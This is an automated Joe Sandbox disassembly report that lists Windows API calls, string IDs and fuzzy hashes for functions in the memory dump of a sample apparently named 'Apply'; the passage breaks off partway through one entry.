                                                    • API String ID: 3076010158-4108050209
                                                    • Opcode ID: b2ac31ce41286ebf513f05db7affc92ff2d8818896a192c8b347a1a64db7bec2
                                                    • Instruction ID: 3f943a424d966249613dd23ce5bdbe7d118c67b9e8ea7e6685ee253ce88eb0fe
                                                    • Opcode Fuzzy Hash: b2ac31ce41286ebf513f05db7affc92ff2d8818896a192c8b347a1a64db7bec2
                                                    • Instruction Fuzzy Hash: 1D415B74A01289EFEB20CF55D884EAABBB8FF56318F045169E929DB261C730ED44CF50
                                                    APIs
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                      • Part of subcall function 008B4392: GetClassNameW.USER32(?,?,000000FF), ref: 008B43B5
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008B2548
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008B255B
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 008B258B
                                                      • Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_wcslen$ClassName
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 2081771294-1403004172
                                                    • Opcode ID: 7aa391f9c7b2f2b2f1d4db592c15aa994873bfe70e3a357a42eb3fbffa93c962
                                                    • Instruction ID: 3827a890c22b83c122855e365cf87e98343db0ee86f3d278bd17cb3a79ec6bad
                                                    • Opcode Fuzzy Hash: 7aa391f9c7b2f2b2f1d4db592c15aa994873bfe70e3a357a42eb3fbffa93c962
                                                    • Instruction Fuzzy Hash: C2210771940108BEDB15ABA4CC9ACFFBBB8FF45354F504519F822DB3D1CB38494A9621
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008E374B
                                                    • LoadLibraryW.KERNEL32(?), ref: 008E3752
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008E3767
                                                    • DestroyWindow.USER32(?), ref: 008E376F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                    • String ID: SysAnimate32
                                                    • API String ID: 3529120543-1011021900
                                                    • Opcode ID: 947d7cf780539d2954d837030a349b15e91a13b4275399c10b4ae93016206a4a
                                                    • Instruction ID: 1d76a778bb33af5237b2bd7eddfaed75f7b540a51861c5c4f6ddc3f3b6cd0a94
                                                    • Opcode Fuzzy Hash: 947d7cf780539d2954d837030a349b15e91a13b4275399c10b4ae93016206a4a
                                                    • Instruction Fuzzy Hash: C1216DB1210289BBEB104FB6DC88EAB37A9FB56369F104628F910D71A0D771DD51A760
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0087506E,?,?,0087500E,?,009198A8,0000000C,00875165,?,00000002), ref: 008750DD
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008750F0
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0087506E,?,?,0087500E,?,009198A8,0000000C,00875165,?,00000002,00000000), ref: 00875113
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 87157476b8592f0af77177cc7c08f2dbaefefa2b451a7455b1d3ba37cdc3daea
                                                    • Instruction ID: 666716bc0ac90101f7c0bf79d36064a03e3b67d2e404298a3fc5be5843deb329
                                                    • Opcode Fuzzy Hash: 87157476b8592f0af77177cc7c08f2dbaefefa2b451a7455b1d3ba37cdc3daea
                                                    • Instruction Fuzzy Hash: 2EF0AF30A0030CBBDB109BA4DC89BADBFB4FF04712F404068F80DE6264DB709944CAA0
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,008554F0,?,?,00855184,?,00000001,?,?,00000000), ref: 008554AF
                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008554C1
                                                    • FreeLibrary.KERNEL32(00000000,?,?,008554F0,?,?,00855184,?,00000001,?,?,00000000), ref: 008554D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 145871493-3689287502
                                                    • Opcode ID: 5918150eded463d220edcf9300d018952c6853a678799a4a9cdfb29d256802ad
                                                    • Instruction ID: 869ec9db9937bbd7e08bf3cbe7fa8c7ed9b752eefbe197ca0f58028578ec81fe
                                                    • Opcode Fuzzy Hash: 5918150eded463d220edcf9300d018952c6853a678799a4a9cdfb29d256802ad
                                                    • Instruction Fuzzy Hash: 7BE0C276B02B621B92221715AC18B6EB629FFC2F337054055FE06EA204DB64CC4980E4
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0089466F,?,?,00855184,?,00000001,?,?,00000000), ref: 00855475
                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00855487
                                                    • FreeLibrary.KERNEL32(00000000,?,?,0089466F,?,?,00855184,?,00000001,?,?,00000000), ref: 0085549A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 145871493-1355242751
                                                    • Opcode ID: 925efb8314ed4e100780712831bb20936cc0fb4af8b4533dc6e021cd9eeda6eb
                                                    • Instruction ID: bf774a84bf8255c7813c718b82a8d519f2738f5cee1f28096768057378d805d9
                                                    • Opcode Fuzzy Hash: 925efb8314ed4e100780712831bb20936cc0fb4af8b4533dc6e021cd9eeda6eb
                                                    • Instruction Fuzzy Hash: E2D01275602BA16B46321725EC18ADABB26FE85B273454025BC04EA114DF25DD89859C
                                                    APIs
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008C32EE
                                                    • DeleteFileW.KERNEL32(?), ref: 008C3370
                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008C3386
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008C3397
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008C33A9
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: File$Delete$Copy
                                                    • String ID:
                                                    • API String ID: 3226157194-0
                                                    • Opcode ID: 603d2f4d0fdacf095a47fac7962a98334ac7fd3fcf11e99450d0eb8e35cf44b2
                                                    • Instruction ID: e46d6a852eb737bc0fbad0bd824a948596eca244b2aa04270b52acb3038b04c2
                                                    • Opcode Fuzzy Hash: 603d2f4d0fdacf095a47fac7962a98334ac7fd3fcf11e99450d0eb8e35cf44b2
                                                    • Instruction Fuzzy Hash: F3B11D72900219ABDF11DBA8CC85EDEBBBDFF49315F1080AAF509E6145EA30DB458F61
                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32 ref: 008DABAE
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008DABBC
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 008DABEF
                                                    • CloseHandle.KERNEL32(?), ref: 008DADC4
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                    • String ID:
                                                    • API String ID: 3488606520-0
                                                    • Opcode ID: 998c2bff352128d18817f63e18de37b2983efbfe621936bfb57e134469c29d1a
                                                    • Instruction ID: 04687b1900259742faf0da78028c8276a7e5e1785e643129063ee7c231f81fe2
                                                    • Opcode Fuzzy Hash: 998c2bff352128d18817f63e18de37b2983efbfe621936bfb57e134469c29d1a
                                                    • Instruction Fuzzy Hash: 2CA19C71604300AFD724EF28C882B2AB7E5FB44725F14895DF999DB392D770ED458B82
                                                    APIs
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                      • Part of subcall function 008DD11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008DBE35,?,?), ref: 008DD13C
                                                      • Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD178
                                                      • Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD1E6
                                                      • Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD21C
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DC22C
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008DC287
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 008DC2EA
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 008DC32D
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 008DC33A
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                    • String ID:
                                                    • API String ID: 826366716-0
                                                    • Opcode ID: 5d7b26341f9fdba3183f3e2ac92ed41a7cb2142848af0e1be892ee0d03c0d3f5
                                                    • Instruction ID: e13a4b6b368b2967fc4367459090e874c4afe79b4dcd2d1dc569939002760a04
                                                    • Opcode Fuzzy Hash: 5d7b26341f9fdba3183f3e2ac92ed41a7cb2142848af0e1be892ee0d03c0d3f5
                                                    • Instruction Fuzzy Hash: 17614C31208242AFD714DF54C495E2ABBE5FF84308F54869DF4998B392DB31ED4ACB92
                                                    APIs
                                                      • Part of subcall function 008BE421: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008BD507,?), ref: 008BE43E
                                                      • Part of subcall function 008BE421: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008BD507,?), ref: 008BE457
                                                      • Part of subcall function 008BE7DA: GetFileAttributesW.KERNEL32(?,008BD57A), ref: 008BE7DB
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 008BEAB4
                                                    • MoveFileW.KERNEL32(?,?), ref: 008BEAED
                                                    • _wcslen.LIBCMT ref: 008BEC2C
                                                    • _wcslen.LIBCMT ref: 008BEC44
                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 008BEC91
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                    • String ID:
                                                    • API String ID: 3183298772-0
                                                    • Opcode ID: 916c3f73eb5b61895118a8b41a6e26c0b4dcd67aade5d2f06b64d12b71c2a316
                                                    • Instruction ID: 91b7b26f1baf9e7bfd0b26c9efde531e9f79ba7b3d36e409e9e55b81848996a3
                                                    • Opcode Fuzzy Hash: 916c3f73eb5b61895118a8b41a6e26c0b4dcd67aade5d2f06b64d12b71c2a316
                                                    • Instruction Fuzzy Hash: ED5130B24083959FC724EB94C8819DBB7ECFF94311F40492EF689D3291EE70A6898757
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 008B92C6
                                                    • VariantClear.OLEAUT32 ref: 008B9337
                                                    • VariantClear.OLEAUT32 ref: 008B9396
                                                    • VariantClear.OLEAUT32(?), ref: 008B9409
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 008B9434
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType
                                                    • String ID:
                                                    • API String ID: 4136290138-0
                                                    • Opcode ID: 4df10d05ec899ccf79de1ccaa99687c2f9adb535d34d09db94e8bff11ea43fe7
                                                    • Instruction ID: ce01bc4d6a1a114a5c51f53a8f23f3a76b65c13b03f413d9f40a20ad9481b34a
                                                    • Opcode Fuzzy Hash: 4df10d05ec899ccf79de1ccaa99687c2f9adb535d34d09db94e8bff11ea43fe7
                                                    • Instruction Fuzzy Hash: FB515AB5A00619EFCB14CF68C884AAAB7F9FF8D314B158159E949DB350E730E912CB94
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008C931D
                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 008C9349
                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008C93A1
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008C93C6
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008C93CE
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String
                                                    • String ID:
                                                    • API String ID: 2832842796-0
                                                    • Opcode ID: 34cd5ae8ea85beda34e08aca6a651c04482a7c76b7fcf40d9859fc90f83ffb7c
                                                    • Instruction ID: c59c46964866ca6c6e669c73a33422dd6f3e2def9b82c146d27cc244f0208dbf
                                                    • Opcode Fuzzy Hash: 34cd5ae8ea85beda34e08aca6a651c04482a7c76b7fcf40d9859fc90f83ffb7c
                                                    • Instruction Fuzzy Hash: 48511A35A002559FCB05DF69C885E69BBF5FF48314F048098E949AB3A2CB35ED45CB91
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 008D96C7
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 008D9757
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 008D9773
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 008D97B9
                                                    • FreeLibrary.KERNEL32(00000000), ref: 008D97D9
                                                      • Part of subcall function 0086FAC6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,008C172C,?,7529E610), ref: 0086FAE3
                                                      • Part of subcall function 0086FAC6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,008B00EB,00000000,00000000,?,?,008C172C,?,7529E610,?,008B00EB), ref: 0086FB0A
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                    • String ID:
                                                    • API String ID: 666041331-0
                                                    • Opcode ID: 5b02f9299e72908234574eaa5f522f8b1822aca3e2863d26fdce0d7c7e9eab43
                                                    • Instruction ID: be776de748b190e93fc629d736068586dc9520e228e505949804ed2bbd571e7d
                                                    • Opcode Fuzzy Hash: 5b02f9299e72908234574eaa5f522f8b1822aca3e2863d26fdce0d7c7e9eab43
                                                    • Instruction Fuzzy Hash: F6513834600205DFCB01DF58C494CA9BBB4FF09354B0581A9E85AEB762DB31ED86CF92
                                                    APIs
                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 008E72FE
                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 008E7315
                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 008E733E
                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,008CB2E8,00000000,00000000), ref: 008E7363
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 008E7392
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$MessageSendShow
                                                    • String ID:
                                                    • API String ID: 3688381893-0
                                                    • Opcode ID: ab1b510b7344d4f69507b764b2cf29410f8b6d483896b1001c7581e3188a368e
                                                    • Instruction ID: 89cc128e9e7c4e381e38f6296ea82a5bc7f11f4ee270a8f2ab7ef91aaa86bded
                                                    • Opcode Fuzzy Hash: ab1b510b7344d4f69507b764b2cf29410f8b6d483896b1001c7581e3188a368e
                                                    • Instruction Fuzzy Hash: B3418135A08284ABD725CF69CC84FA57B65FB46350F150264FA1AEB3E1C770AD41DA50
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 311166bc14e2161d9a4ba2871e3bdf042c457ebf6b5bfa35109ce2a0de48fbfc
                                                    • Instruction ID: 85bb59a8f9c45601cb40e8f8723a3918c2c425f3c60029908dc2f01e0a63e250
                                                    • Opcode Fuzzy Hash: 311166bc14e2161d9a4ba2871e3bdf042c457ebf6b5bfa35109ce2a0de48fbfc
                                                    • Instruction Fuzzy Hash: CB41D272A002049FCB20EF78C891A6EB7E5FF89724F1585A9E515EB391DB31ED01CB91
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 0085136E
                                                    • ScreenToClient.USER32(00000000,?), ref: 0085138B
                                                    • GetAsyncKeyState.USER32(00000001), ref: 008513C2
                                                    • GetAsyncKeyState.USER32(00000002), ref: 008513DC
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                    • Opcode ID: bfe5a392a937a25c3252c0c16465205d5ff28efc9e1f7f16b9f80a54692916b0
                                                    • Instruction ID: 30d219a5eaca44c0ce40a1d69e0aa34da3fa03318503a24f47f82b8650bd8f82
                                                    • Opcode Fuzzy Hash: bfe5a392a937a25c3252c0c16465205d5ff28efc9e1f7f16b9f80a54692916b0
                                                    • Instruction Fuzzy Hash: AA415F71A0421AFBDF05AF68C848BEEB775FB05324F248229E825E7290D7345D54DB91
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 008CD6A7
                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 008CD6DE
                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,008CC98D,00000000), ref: 008CD723
                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,008CC98D,00000000), ref: 008CD737
